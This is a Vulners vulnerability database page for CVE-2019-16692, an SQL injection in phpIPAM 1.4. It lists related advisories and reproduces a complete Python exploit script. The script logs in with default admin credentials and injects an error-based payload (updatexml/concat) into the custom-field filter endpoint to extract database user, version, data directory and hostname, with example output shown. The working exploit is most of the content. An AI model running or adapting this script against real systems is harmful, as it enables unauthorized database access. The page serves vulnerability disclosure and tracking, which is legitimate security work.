Vulners
Lucene search
phpIPAM 1.4 - SQL Injection
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | phpIPAM 1.4 - SQL Injection Vulnerability | 30 Sep 201900:00 | – | zdt |
 | Exploit for SQL Injection in Phpipam | 27 Sep 201913:18 | – | githubexploit |
 | CVE-2019-16692 | 11 Oct 202421:55 | – | circl |
 | SQL Servers Time-based SQL Injection (CVE-2011-4710; CVE-2019-13978; CVE-2019-16065; CVE-2019-16119; CVE-2019-16383; CVE-2019-16692; CVE-2020-15468; CVE-2020-26518; CVE-2020-29284; CVE-2021-21915; CVE-2021-21916; CVE-2021-21917; CVE-2022-23337; CVE-2022-25149) | 26 May 201400:00 | – | checkpoint_advisories |
 | CVE-2019-16692 | 22 Sep 201914:58 | – | cve |
 | CVE-2019-16692 | 22 Sep 201914:58 | – | cvelist |
 | phpIPAM 1.4 - SQL Injection | 30 Sep 201900:00 | – | exploitpack |
 | CVE-2019-16692 | 22 Sep 201915:15 | – | nvd |
 | phpIPAM <= 1.4 Multiple SQLi Vulnerabilities | 25 Sep 201900:00 | – | openvas |
 | phpIPAM 1.4 SQL Injection | 30 Sep 201900:00 | – | packetstorm |
10
#!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Exploit Author: Kevin Kirsche
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
# Python 3
# requests package
# CVE: CVE-2019-16692
# For more details, view:
# https://github.com/phpipam/phpipam/issues/2738
# https://github.com/kkirsche/CVE-2019-16692
# Example Output
# [+] Executing select user()
# [*] Received: [email protected]
# [+] Executing select system_user()
# [*] Received: [email protected]
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu
from requests import Session
host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"
credentials = {
"ipamusername": "Admin",
"ipampassword": "Password",
}
payload = {
"action": "add",
"table": "",
}
cmds = {
"unpriv": [
"select user()",
"select system_user()",
"select @@version",
"select @@datadir",
"select @@hostname",
]
}
if __name__ == "__main__":
client = Session()
resp = client.post(login_url, data=credentials)
if resp.status_code == 200:
for cmd in cmds["unpriv"]:
print(f"[+] Executing {cmd}")
payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
resp = client.post(exploit_url, data=payload)
info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
print(f"[*] Received: {info}")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Sep 2019 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
CVSS 3.19.8
EPSS0.16281